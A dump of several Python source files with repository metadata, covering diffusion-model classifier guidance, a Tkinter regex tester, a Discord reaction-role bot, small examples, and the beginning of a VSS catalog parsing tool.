batch_probability_distribution = th.zeros((step_size, args.batch_size, args.classifier_out_channels,), device=dist_util.dev())
def cond_fn(x, t, y=None, prior_variance=1.0, t_range_start=0, t_range_end=1000):
assert y is not None
step_id = t[0].item() // 40
with th.enable_grad():
x_in = x.detach().requires_grad_(True)
output = classifier(x_in, t)
logits = output
log_probs = F.log_softmax(logits, dim=-1) # (B, C)
selected = log_probs[range(len(logits)), y.view(-1)] # (B, )
cond_grad = th.autograd.grad(selected.sum(), x_in)[0]
cond_grad = cond_grad * args.classifier_scale
with th.no_grad():
if args.use_cond_range_scale:
if t[0] >= 600 and t[0] < 800:
cond_grad = cond_grad * 3
probs = F.softmax(logits, dim=-1) # (B, C)
entropy = (-log_probs * probs).sum(dim=-1) # (B, )
entropy_scale = 1.0 / (entropy / np.log(args.classifier_out_channels)) # (B, )
original_grad_norm = th.norm(cond_grad, p=2, dim=(1, 2, 3), dtype=th.float32).detach()
batch_probability[step_id] = probs[range(len(logits)), y.view(-1)]
batch_probability_distribution[step_id] = probs
batch_grad_norm[step_id] = original_grad_norm
batch_entropy[step_id] = entropy
batch_entropy_scale[step_id] = entropy_scale
logger.log(
'\n',
't = ', t[0].detach(), '\n',
'\t\t mean std median', '\n',
'\t\t grad_norm =', original_grad_norm.mean(-1).detach(),
original_grad_norm.std(-1).detach(), original_grad_norm.median(-1).values, '\n',
'\t\t logits = ', selected.mean(-1).detach(),
selected.std(-1).detach(), selected.median(-1).values, '\n',
'\t\t entropy = ', entropy.mean(-1).detach(), entropy.std(-1).detach(), entropy.median(-1).values, '\n',
'\t\t entropy_scale = ', entropy_scale.mean(-1).detach(), entropy_scale.std(-1).detach(), entropy_scale.median(-1).values, '\n',
)
if args.use_entropy_scale and (t[0] >= t_range_start and t[0] < t_range_end):
cond_grad = cond_grad * entropy_scale.reshape(-1, 1, 1, 1).repeat(1, *cond_grad[0].shape)
updated_grad_norm = th.norm(cond_grad, p=2, dim=(1, 2, 3), dtype=th.float32).detach()
batch_updated_grad_norm[step_id].append(updated_grad_norm)
logger.log(
'\t\t updated_grad_norm = ', updated_grad_norm.mean(-1).detach(), updated_grad_norm.std(-1).detach(), updated_grad_norm.median(-1).values, '\n',
'\n'
)
return cond_grad
def model_fn(x, t, y=None, t_range_start=0, t_range_end=1000):
assert y is not None
return model(x, t, y if args.class_cond else None)
data_loader = load_data(
data_dir=args.data_dir,
batch_size=args.batch_size,
image_size=args.classifier_image_size,
class_cond=True,
random_crop=True,
dataset_type=args.dataset_type,
used_attributes=args.used_attributes,
tot_class=args.tot_class,
imagenet200_class_list_file_path=args.imagenet200_class_list_file_path,
celeba_attribures_path=args.celeba_attribures_path
)
logger.log("sampling...")
all_images, all_labels = [], []
all_grad_norm = []
all_updated_grad_norm = []
all_probability = []
all_entropy = []
all_entropy_scale = []
all_probability_distribution = []
id = 0
while len(all_images) * args.batch_size < args.num_samples:
id += 1
batch, extra = next(data_loader)
labels = extra["y"].to(dist_util.dev()) # labels: (B, )
batch = batch.to(dist_util.dev()) # batch: (B, C, H, W)
for t in range(24, -1, -1):
batch_t = th.ones(batch.shape[0], dtype=th.long, device=dist_util.dev()) * t
diffused_batch = diffusion.q_sample(batch, batch_t)
cond_grad = cond_fn(
x=diffused_batch,
t=batch_t * 40,
y=labels,
prior_variance=1.0,
t_range_start=0,
t_range_end=1000
)
gathered_samples = get_gathered_item(diffused_batch)
all_images.extend([sample.cpu().numpy() for sample in gathered_samples])
gathered_labels = get_gathered_item(labels)
all_labels.extend([labels.cpu().numpy() for labels in gathered_labels])
logger.log(f"created {len(all_images) * args.batch_size} / {args.num_samples} samples")
gathered_batch_grad_norm = get_gathered_item(batch_grad_norm)
gathered_batch_updated_grad_norm = get_gathered_item(batch_updated_grad_norm)
gathered_batch_probability = get_gathered_item(batch_probability)
gathered_batch_entropy = get_gathered_item(batch_entropy)
gathered_batch_entropy_scale = get_gathered_item(batch_entropy_scale)
gathered_batch_probability_distribution = get_gathered_item(batch_probability_distribution)
all_grad_norm.extend([x.cpu().numpy() for x in gathered_batch_grad_norm])
all_updated_grad_norm.extend([x.cpu().numpy() for x in gathered_batch_updated_grad_norm])
all_probability.extend([x.cpu().numpy() for x in gathered_batch_probability])
all_entropy.extend([x.cpu().numpy() for x in gathered_batch_entropy])
all_entropy_scale.extend([x.cpu().numpy() for x in gathered_batch_entropy_scale])
all_probability_distribution.extend([x.cpu().numpy() for x in gathered_batch_probability_distribution])
if dist.get_rank() == 0:
arr = np.concatenate(all_images, axis=0)
arr = arr[: args.num_samples]
label_arr = np.concatenate(all_labels, axis=0)
label_arr = label_arr[: args.num_samples]
all_grad_norm = np.concatenate(all_grad_norm, axis=1)[:args.num_samples]
all_updated_grad_norm = np.concatenate(all_updated_grad_norm, axis=1)[:args.num_samples]
all_probability = np.concatenate(all_probability, axis=1)[:args.num_samples]
all_entropy = np.concatenate(all_entropy, axis=1)[:args.num_samples]
all_entropy_scale = np.concatenate(all_entropy_scale, axis=1)[:args.num_samples]
all_probability_distribution = np.concatenate(all_probability_distribution, axis=1)[:args.num_samples]
shape_str = "x".join([str(x) for x in arr.shape])
out_path = os.path.join(logger.get_dir(), "scale{}_steps{}_class0-{}_samples_{}.npz".format(args.classifier_scale, args.timestep_respacing, args.tot_class - 1, shape_str))
logger.log(f"saving to {out_path}")
np.savez(out_path, arr, label_arr)
metainfo_out_path = os.path.join(logger.get_dir(), "metainfo_scale{}_steps{}_class0-{}_samples_{}.npz".format(args.classifier_scale, args.timestep_respacing, args.tot_class - 1, shape_str))
np.savez(metainfo_out_path, all_grad_norm=all_grad_norm, all_updated_grad_norm=all_updated_grad_norm,
all_probability=all_probability, all_entropy=all_entropy, all_entropy_scale=all_entropy_scale,
all_probability_distribution=all_probability_distribution)
# sample_dir = "images_" + "scale{}_steps{}_sample{}".format(args.classifier_scale, args.timestep_respacing, args.num_samples)
# save_samples(arr, label_arr, args.classifier_out_channels, sample_dir=sample_dir)
dist.barrier()
logger.log("sampling complete")
def create_argparser():
defaults = dict(
clip_denoised=True,
num_samples=10000,
batch_size=16,
use_ddim=False,
model_path="",
classifier_path="",
classifier_scale=1.0,
log_root="",
save_name="",
gpus="",
t_range_start=0,
t_range_end=1000,
use_entropy_scale=False,
expected_classifier_gradient_value=-1.0,
selected_class=-1,
use_cond_range_scale=False,
data_dir="",
val_data_dir="",
tot_class=1000,
dataset_type='imagenet-1000',
used_attributes="",
imagenet200_class_list_file_path="",
celeba_attribures_path="",
)
defaults.update(diffusion_defaults())
defaults.update(model_defaults())
defaults.update(classifier_defaults())
parser = argparse.ArgumentParser()
parser.add_argument("--local_rank", type=int, default=0)
add_dict_to_argparser(parser, defaults)
return parser
if __name__ == "__main__":
main()
| 39.993007 | 197 | 0.657283 | 1,543 | 11,438 | 4.540506 | 0.146468 | 0.038824 | 0.036397 | 0.016985 | 0.369969 | 0.307879 | 0.252641 | 0.220383 | 0.175707 | 0.14145 | 0 | 0.016216 | 0.223641 | 11,438 | 285 | 198 | 40.133333 | 0.772748 | 0.034097 | 0 | 0.035398 | 0 | 0 | 0.040518 | 0.008067 | 0 | 0 | 0 | 0 | 0.00885 | 1 | 0.022124 | false | 0 | 0.053097 | 0 | 0.09292 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62149f7e39d96fa202074b79f760cbbfe9a7a331 | 504 | py | Python | portainer/app/__init__.py | duedil-ltd/portainer | 280a9e298042269419774382bd58825354f0132b | [
"MIT"
] | 62 | 2015-01-14T15:30:46.000Z | 2021-12-06T14:33:20.000Z | portainer/app/__init__.py | duedil-ltd/portainer | 280a9e298042269419774382bd58825354f0132b | [
"MIT"
] | 27 | 2015-01-22T13:53:11.000Z | 2017-03-15T21:44:31.000Z | portainer/app/__init__.py | duedil-ltd/portainer | 280a9e298042269419774382bd58825354f0132b | [
"MIT"
] | 18 | 2015-08-20T20:23:51.000Z | 2018-11-19T16:03:04.000Z | """
"""
import argparse
parser = argparse.ArgumentParser(
prog="portainer",
fromfile_prefix_chars="@"
)
subparsers = parser.add_subparsers()
def subcommand(name, callback=None):
"""A decorator for main functions to add themselves as subcommands."""
def decorator(fn):
subparser = subparsers.add_parser(name)
subparser.set_defaults(_fn=fn, _name=name, _parser=subparser)
if callback:
callback(subparser)
return fn
return decorator
| 18 | 74 | 0.668651 | 54 | 504 | 6.092593 | 0.574074 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.228175 | 504 | 27 | 75 | 18.666667 | 0.845758 | 0.126984 | 0 | 0 | 0 | 0 | 0.023419 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.142857 | false | 0 | 0.071429 | 0 | 0.357143 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621631adcf8c4cf0b96d0c782bffb9ce30534b16 | 6,647 | pyw | Python | regexp_checker.pyw | Storvild/python_regexp_checker | e3cfe817f5377aa1f64aa4a110b5bb2ead573679 | [
"Apache-2.0"
] | null | null | null | regexp_checker.pyw | Storvild/python_regexp_checker | e3cfe817f5377aa1f64aa4a110b5bb2ead573679 | [
"Apache-2.0"
] | null | null | null | regexp_checker.pyw | Storvild/python_regexp_checker | e3cfe817f5377aa1f64aa4a110b5bb2ead573679 | [
"Apache-2.0"
] | null | null | null | from tkinter import *
from tkinter import messagebox
import re
import json
SRE_FLAG_TEMPLATE = 1 # template mode (disable backtracking)
SRE_FLAG_IGNORECASE = 2 # case insensitive
SRE_FLAG_LOCALE = 4 # honour system locale
SRE_FLAG_MULTILINE = 8 # treat target as multiline string
SRE_FLAG_DOTALL = 16 # treat target as a single string
SRE_FLAG_UNICODE = 32 # use unicode "locale"
SRE_FLAG_VERBOSE = 64 # ignore whitespace and comments
SRE_FLAG_DEBUG = 128 # debugging
SRE_FLAG_ASCII = 256 # use ascii "locale"
EXAMPLE_TEXT = 'My 123 Test 456'
EXAMPLE_PATTERN = 'My (?P<first>\d+) T(.?)st (?P<second>\d+)'
def exec_pattern(event):
try:
search_res = re.search(get_pattern(), get_source(), get_ignorecase() | get_dotall() | get_multiline())
#result = search_res.groupdict()
#result = search_res.groups()
result = search_res
if result:
set_result(result)
add_result('groups ({}):'.format(len(result.groups())))
add_result(result.groups())
add_result('groupdict ({}):'.format(len(result.groupdict())))
group_dict = json.dumps(result.groupdict(), ensure_ascii=False, indent=4)
#group_dict = result.groupdict()
add_result(group_dict)
#text_result.insert(1.0, result)
else:
set_result('ДАННЫЕ НЕ НАЙДЕНЫ!')
#text_result.delete(1.0, END)
#text_result.insert(1.0, 'Данные не неайдены!')
print(result)
except Exception as e:
set_result('ОШИБКА:')
add_result(e)
#text_result.delete(1.0, END)
#text_result.insert(1.0, e)
def but_test():
exec_pattern(None)
#messagebox.showinfo("GUI Python", text_pattern.get(1.0, END))
#text_source.insert(1.0, 'text')
#text_source.delete(1.0, END)
root = Tk()
root.title("GUI на Python")
#root.geometry("300x250")
root.event_add('<<Paste>>', '<Control-igrave>') # По умолчанию в русской раскладке Ctrl+м не работает
root.event_add("<<Copy>>", "<Control-ntilde>") # По умолчанию в русской раскладке Ctrl+с не работает
root.event_add("<<Cut>>", "<Control-division>") # <<Cut>> Ctrl+с 0247 division
root.event_add("<<Undo>>", "<Control-ydiaeresis>") #<<Undo>> Ctrl+z Ctrl+я 0255 ydiaeresis
#https://ru.stackoverflow.com/questions/816947/Почему-с-rus-раскладкой-ctrv-и-ctrc-не-работает-а-с-eng-все-работаетtkinter
#message = StringVar()
frame1 = Frame(bg='yellow')
frame1.pack(fill=BOTH)
def get_source():
return text_source.get(1.0, END).strip()
text_source = Text(frame1, height=10, bg='#EEE')
text_source.pack(side=TOP, fill=BOTH, expand=1) #anchor=SE
#scroll1 = Scrollbar(frame1, command=text_source.yview)
#scroll1.pack(side=RIGHT, expand=0.1)
#text_source.config(yscrollcommand=scroll1.set)
text_source.bind('<KeyRelease>', exec_pattern)
def get_pattern():
return text_pattern.get(1.0, END).strip()
text_pattern = Text(height=6)
text_pattern.pack(side=TOP, fill=BOTH, expand=1)
#text_pattern.bind('<Key>', exec_pattern)
#text_pattern.bind('<KeyPress>', exec_pattern)
text_pattern.bind('<KeyRelease>', exec_pattern)
text_pattern.focus_set()
frame_buttons = Frame() #bg='gray'
frame_buttons.pack(fill=Y)
but1 = Button(frame_buttons, text='RUN CHECK', command=but_test)
but1.pack(side=LEFT, expand=1)
var_multiline = BooleanVar()
cb_multiline = Checkbutton(frame_buttons, text='MULTILINE', variable=var_multiline, onvalue=SRE_FLAG_MULTILINE, offvalue=0)
cb_multiline.pack(side=RIGHT)
cb_multiline.select()
var_ignorecase = BooleanVar()
cb_ignorecase = Checkbutton(frame_buttons, text='IGNORECASE', variable=var_ignorecase, onvalue=SRE_FLAG_IGNORECASE, offvalue=0)
cb_ignorecase.pack(side=RIGHT)
cb_ignorecase.select()
#var_ignorecase.set(0)
var_dotall = BooleanVar()
cb_dotall = Checkbutton(frame_buttons, text='DOTALL', variable=var_dotall, onvalue=SRE_FLAG_DOTALL, offvalue=0)
cb_dotall.pack(side=RIGHT)
cb_dotall.select()
def get_multiline():
if var_multiline.get():
return re.MULTILINE
else:
return 0
def get_ignorecase():
if var_ignorecase.get():
return re.IGNORECASE
else:
return 0
def get_dotall():
if var_dotall.get():
return re.DOTALL
else:
return 0
def set_wordwrap():
if var_wordwrap.get():
text_source.config(wrap=WORD)
else:
text_source.config(wrap=NONE)
#messagebox.showinfo("GUI Python", 'TEST')
var_wordwrap = BooleanVar()
cb_wordwrap = Checkbutton(frame_buttons, text='WordWrap', variable=var_wordwrap, onvalue=1, offvalue=0, command=set_wordwrap)
cb_wordwrap.pack(side=RIGHT)
cb_wordwrap.select()
def set_result(var):
text_result.delete(1.0, END)
text_result.insert(1.0, var)
def add_result(var):
text_result.insert(END, '\n')
text_result.insert(END, var)
text_result = Text(height=10, fg='black', bg='#DDD')
text_result.pack(side=TOP, fill=BOTH, expand=1)
#message = StringVar()
#message_entry = Entry(textvariable=message)
#message_entry.place(relx=.5, rely=.1, anchor="c")
#message_button = Button(text="Click Me", command=show_message)
#message_button.place(relx=.5, rely=.5, anchor="c")
# Контекстное меню
def func(event):
root.menu.post(event.x_root, event.y_root)
root.w = event.widget
root.menu = Menu(tearoff=0)
root.menu.add_command(label="Вырезать", accelerator="Ctrl+X",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Cut>>"))
root.menu.add_command(label="Копировать", accelerator="Ctrl+С",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Copy>>"))
root.menu.add_command(label="Вставить", accelerator="Ctrl+V",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Paste>>"))
root.menu.add_command(label="Удалить", accelerator="Delete",
command=lambda: root.w.focus_force() or root.w.event_generate("<<Clear>>"))
root.menu.add_separator()
root.menu.add_command(label="Выделить все", accelerator="Ctrl+A",
command=lambda: root.w.focus_force() or root.w.event_generate("<<SelectAll>>"))
text_source.bind("<Button-3>", func)
text_pattern.bind("<Button-3>", func)
# Конец Контекстное меню
# ВСТАВКА ПРИМЕРА
text_source.insert(1.0, EXAMPLE_TEXT)
text_pattern.insert(1.0, EXAMPLE_PATTERN)
exec_pattern(None)
root.mainloop()
# Не работает вставка через Ctrl+V
# Нет контекстного меню Вставить, Скопировать
# Не работает Ctrl+F
| 34.801047 | 128 | 0.678351 | 908 | 6,647 | 4.789648 | 0.26652 | 0.006438 | 0.012877 | 0.020694 | 0.212463 | 0.129455 | 0.100023 | 0.082088 | 0.082088 | 0.082088 | 0 | 0.019647 | 0.180683 | 6,647 | 190 | 129 | 34.984211 | 0.77892 | 0.241312 | 0 | 0.081967 | 0 | 0 | 0.093861 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.090164 | false | 0 | 0.032787 | 0.016393 | 0.188525 | 0.008197 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62177de7b37043305088aa00516739d705678fa0 | 684 | py | Python | solutions/python3/901.py | sm2774us/amazon_interview_prep_2021 | f580080e4a6b712b0b295bb429bf676eb15668de | [
"MIT"
] | 42 | 2020-08-02T07:03:49.000Z | 2022-03-26T07:50:15.000Z | solutions/python3/901.py | ajayv13/leetcode | de02576a9503be6054816b7444ccadcc0c31c59d | [
"MIT"
] | null | null | null | solutions/python3/901.py | ajayv13/leetcode | de02576a9503be6054816b7444ccadcc0c31c59d | [
"MIT"
] | 40 | 2020-02-08T02:50:24.000Z | 2022-03-26T15:38:10.000Z | class StockSpanner:
def __init__(self):
self.arr = []
self.res = []
def next(self, price):
"""
:type price: int
:rtype: int
"""
if self.arr and self.arr[-1] > price: self.res.append(1)
else:
i = len(self.arr) - 1
while i >= 0:
if self.arr[i] <= price and self.res[i]:
i -= self.res[i]
else: break
self.res.append(len(self.arr) - i)
self.arr.append(price)
return self.res[-1]
# Your StockSpanner object will be instantiated and called as such:
# obj = StockSpanner()
# param_1 = obj.next(price) | 25.333333 | 67 | 0.486842 | 86 | 684 | 3.813953 | 0.383721 | 0.14939 | 0.054878 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.014252 | 0.384503 | 684 | 27 | 68 | 25.333333 | 0.764846 | 0.207602 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0.133333 | false | 0 | 0 | 0 | 0.266667 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
6217889c1bbbef2a3d7e2394bbae342042ec5c78 | 419 | py | Python | examples/grouped_barplot.py | Pratik325/seaborn | f123d9b9f46caea4942f392e8f8d1805c121fe01 | [
"BSD-3-Clause"
] | null | null | null | examples/grouped_barplot.py | Pratik325/seaborn | f123d9b9f46caea4942f392e8f8d1805c121fe01 | [
"BSD-3-Clause"
] | null | null | null | examples/grouped_barplot.py | Pratik325/seaborn | f123d9b9f46caea4942f392e8f8d1805c121fe01 | [
"BSD-3-Clause"
] | 1 | 2020-10-15T04:56:00.000Z | 2020-10-15T04:56:00.000Z | """
Grouped barplots
================
_thumb: .36, .5
"""
import seaborn as sns
sns.set(style="whitegrid")
penguins = sns.load_dataset("penguins")
# Draw a nested barplot by species and sex
g = sns.catplot(
data=penguins, kind="bar",
x="species", y="body_mass_g", hue="sex",
ci="sd", palette="dark", alpha=.6, height=6
)
g.despine(left=True)
g.set_axis_labels("", "Body mass (g)")
g.legend.set_title("")
| 19.952381 | 47 | 0.637232 | 64 | 419 | 4.0625 | 0.734375 | 0.061538 | 0.069231 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0.013889 | 0.140811 | 419 | 20 | 48 | 20.95 | 0.708333 | 0.21957 | 0 | 0 | 0 | 0 | 0.188088 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 | false | 0 | 0.090909 | 0 | 0.090909 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
62196c0a7e683018e9e4859226b62f1095464dff | 8,329 | py | Python | cogs/reaction_roles.py | milindmadhukar/Martin-Garrix-Bot | 571ed68a3eecab34513dd9b12c8527cff865e912 | [
"MIT"
] | 2 | 2021-08-28T07:34:16.000Z | 2021-08-28T11:55:55.000Z | cogs/reaction_roles.py | milindmadhukar/Martin-Garrix-Bot | 571ed68a3eecab34513dd9b12c8527cff865e912 | [
"MIT"
] | null | null | null | cogs/reaction_roles.py | milindmadhukar/Martin-Garrix-Bot | 571ed68a3eecab34513dd9b12c8527cff865e912 | [
"MIT"
] | 1 | 2022-01-05T05:58:29.000Z | 2022-01-05T05:58:29.000Z | import discord
from discord.ext import commands
import asyncio
import emojis as emoji_module
from discord.ext.commands.errors import BadArgument
from cogs.utils import custom_embed
class ReactionRoles(commands.Cog):
def __init__(self, bot) :
self.bot = bot
@commands.has_permissions(administrator=True)
@commands.command(help="Create a reaction role message by assigning roles to emojis.", aliases=['createReaction'])
async def create_reaction_role(self, ctx):
embed = discord.Embed(title="Create a reaction role.", description="Enter the channel to send message in.", colour=discord.Colour.gold())
check = lambda m: (m.author.id == ctx.author.id and m.channel.id == ctx.channel.id)
await ctx.send(embed=embed)
guild = ctx.guild
channel = None
title = None
emojis_role_data = []
timeout_embed = await custom_embed.failure_embed("Setup time out. Please try again.")
try:
user_input = await self.bot.wait_for('message', check=check, timeout = 180)
channel = await commands.TextChannelConverter().convert(ctx=ctx, argument=user_input.content)
await ctx.send(f"Reaction role channel set to be: {channel.mention}")
except BadArgument:
return await ctx.send(embed= await custom_embed.failure_embed("Reaction role setup failed.", description="Please enter a valid channel."))
except asyncio.TimeoutError:
return await ctx.send(embed=timeout_embed)
embed.title = None
embed.description = "Enter the title/category of reaction role."
await ctx.send(embed=embed)
try:
title = await self.bot.wait_for('message', check=check, timeout = 180)
title = title.content
except asyncio.TimeoutError:
return await ctx.send(embed=timeout_embed)
await ctx.send(f"Title set to be: {title}")
user_input = None
count = 0
try:
while user_input != 'exit' and count < 20:
count += 1
await ctx.send(f"""Enter Role name. {"Type 'exit' to stop adding roles." if count > 1 else ''}""")
user_input = await self.bot.wait_for('message', check=check, timeout = 180)
if user_input.content == 'exit':
break
role = discord.utils.get(guild.roles, name=user_input.content)
if role is None:
await ctx.send("That role does not exist. Do you want me to create it?")
createRole = await self.bot.wait_for('message', check=check, timeout = 180)
if createRole.content.lower() in ['yes', 'y', 'ye', 'okay', 'ok' , 'k']:
role = await guild.create_role(name=user_input.content)
await ctx.send(f"Created the role {role.mention} !")
else:
count -= 1
continue
elif role.position > guild.get_member(self.bot.user.id).roles[-1].position:
await ctx.send("Missing permissions to add the role. That role is higher than my role. Place the role below my role to add it to reaction roles.")
count -= 1
continue
embed.description = f"Enter the emoji corresponding to the role {role.mention}"
await ctx.send(embed=embed)
emoji = await self.bot.wait_for('message', check=check, timeout = 180)
emoji = emoji.content
if emoji_module.count(emoji) == 0:
try:
emoji = await commands.PartialEmojiConverter().convert(ctx=ctx, argument=emoji)
except BadArgument:
await ctx.send(embed=await custom_embed.failure_embed(title="Bad emoji argument. Please retry."))
count -= 1
role = None
continue
emojis_role_data.append([role, str(emoji)])
if len(emojis_role_data) == 0:
return
description = ""
for data in emojis_role_data:
description += f"{data[1]} for the {data[0].mention} role.\n"
reaction_embed = discord.Embed(title=title, color=discord.Colour.blue())
reaction_embed.add_field(name="The emojis and corresponding roles are:", value=description)
reaction_message = await channel.send(embed=reaction_embed)
await self.bot.db.execute("INSERT INTO reaction_roles (guild_id, message_id) VALUES ($1,$2)", reaction_message.guild.id, reaction_message.id)
reaction_message_fk = await self.bot.db.fetchrow("SELECT id FROM reaction_roles WHERE guild_id = $1 AND message_id = $2", reaction_message.guild.id, reaction_message.id)
query = "INSERT INTO emoji_role (emoji, role_id, reaction_role_id) VALUES ($1, $2, $3)"
for data in emojis_role_data:
try:
await self.bot.db.execute(query, str(data[1]), data[0].id, reaction_message_fk['id'])
except:
pass
await reaction_message.add_reaction(data[1])
await asyncio.sleep(0.5)
return await ctx.send(embed=await custom_embed.success_embed("Successfully created the reaction roles."))
except asyncio.TimeoutError:
return await ctx.send(embed=timeout_embed)
@commands.Cog.listener()
async def on_raw_reaction_add(self,payload):
if payload.member.bot:
return
query = "SELECT message_id FROM reaction_roles WHERE guild_id = $1"
reaction_roles = await self.bot.db.fetch(query, payload.guild_id)
if payload.message_id not in [role['message_id'] for role in reaction_roles]:
return
else:
guild_id = payload.guild_id
query = "SELECT * FROM reaction_roles JOIN emoji_role ON emoji_role.reaction_role_id = reaction_roles.id WHERE reaction_roles.guild_id = $1 AND reaction_roles.message_id = $2"
records = await self.bot.db.fetch(query, guild_id, payload.message_id)
role = None
records = {record['emoji']: record['role_id'] for record in records}
role_id = records.get(str(payload.emoji))
if role_id is not None:
guild = self.bot.get_guild(guild_id)
role = guild.get_role(role_id)
if role is not None:
await payload.member.add_roles(role, reason="Reaction Role")
try:
return await payload.member.send(f'Gave you the **{role.name}** role!')
except:
pass
@commands.Cog.listener()
async def on_raw_reaction_remove(self,payload):
query = "SELECT message_id FROM reaction_roles WHERE guild_id = $1"
reaction_roles = await self.bot.db.fetch(query, payload.guild_id)
if payload.message_id not in [role['message_id'] for role in reaction_roles]:
return
else:
guild_id = payload.guild_id
guild = None
query = "SELECT * FROM reaction_roles JOIN emoji_role ON emoji_role.reaction_role_id = reaction_roles.id WHERE reaction_roles.guild_id = $1 AND reaction_roles.message_id = $2"
records = await self.bot.db.fetch(query, guild_id, payload.message_id)
role = None
records = {record['emoji']: record['role_id'] for record in records}
role_id = records.get(str(payload.emoji))
if role_id is not None:
guild = self.bot.get_guild(guild_id)
role = guild.get_role(role_id)
if role is not None:
member = guild.get_member(payload.user_id)
await member.remove_roles(role, reason="Reaction Role")
try:
await member.send(f'Removed the **{role.name}** role!')
except:
pass
def setup(bot):
bot.add_cog(ReactionRoles(bot))
| 52.71519 | 188 | 0.587946 | 1,017 | 8,329 | 4.6765 | 0.172075 | 0.049201 | 0.037847 | 0.03217 | 0.463415 | 0.440706 | 0.400967 | 0.388772 | 0.33894 | 0.320017 | 0 | 0.00811 | 0.319006 | 8,329 | 157 | 189 | 53.050955 | 0.830395 | 0 | 0 | 0.486111 | 0 | 0.020833 | 0.206707 | 0.018358 | 0 | 0 | 0 | 0 | 0 | 1 | 0.013889 | false | 0.020833 | 0.041667 | 0 | 0.131944 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | null | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 0 | 1 | 0 |
621b4b015de4cddfed681b62008a4c2685b2bbb4 | 15,007 | py | Python | vss_catalog_manipulator.py | bcvisualbooking/vss_carver | d58896b08fad5d8950ca6807e784a2ec08dc3abb | [
"MIT"
] | 1 | 2019-08-31T11:14:58.000Z | 2019-08-31T11:14:58.000Z | vss_catalog_manipulator.py | bcvisualbooking/vss_carver | d58896b08fad5d8950ca6807e784a2ec08dc3abb | [
"MIT"
] | null | null | null | vss_catalog_manipulator.py | bcvisualbooking/vss_carver | d58896b08fad5d8950ca6807e784a2ec08dc3abb | [
"MIT"
] | null | null | null | #!/usr/bin/env python
# coding=utf-8
#
# vss_catalog_manipulator.py
# Manipulates VSS catalog file that recreated by vss_carver.py.
#
# Copyright (C) 2018 Minoru Kobayashi <unknownbit@gmail.com> (@unkn0wnbit)
#
# This software is released under the MIT License.
# https://opensource.org/licenses/MIT
#
import argparse
import struct
import copy
import datetime
import uuid
from ctypes import *
vss_identifier = b'\x6B\x87\x08\x38\x76\xC1\x48\x4E\xB7\xAE\x04\x04\x6E\x6C\xC7\x52'
class CatalogBlockHeader(LittleEndianStructure):
_fields_ = (
('vssid', c_char * 16),
('version', c_uint32),
('record_type', c_uint32),
('relative_catalog_offset', c_uint64),
('current_catalog_offset', c_uint64),
('next_catalog_offset', c_uint64),
('unknown_empty', c_char * 80)
)
def __init__(self, relative=0, current=0, next_offset=0):
self.vssid = vss_identifier
self.version = 0x1
self.record_type = 0x2
self.relative_catalog_offset = relative
self.current_catalog_offset = current
self.next_catalog_offset = next_offset
self.unknown_empty = b'\x00'
class CatalogEntry0x00(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('unknown', c_char * 120)
)
def __init__(self):
self.catalog_entry_type = 0x0
self.unknown = b'\x00'
class CatalogEntry0x01(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('unknown', c_char * 120)
)
def __init__(self):
self.catalog_entry_type = 0x01
self.unknown = b'\x00'
class CatalogEntry0x02(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('volume_size', c_uint64),
('store_guid', c_ubyte * 16),
('sequence_number', c_uint64),
('unknown_flags', c_uint64),
('shadow_copy_creation_time', c_uint64),
('unknown_empty', c_char * 72)
)
def __init__(self):
self.catalog_entry_type = 0x02
self.unknown_flags = 0x40
self.unknown_empty = b'\x00'
class CatalogEntry0x03(LittleEndianStructure):
_fields_ = (
('catalog_entry_type', c_uint64),
('store_block_list_offset', c_uint64),
('store_guid', c_ubyte * 16),
('store_header_offset', c_uint64),
('store_block_range_offset', c_uint64),
('store_current_bitmap_offset', c_uint64),
('ntfs_file_reference', c_uint64),
('allocated_size', c_uint64),
('store_previous_bitmap_offset', c_uint64),
('unknown', c_uint64),
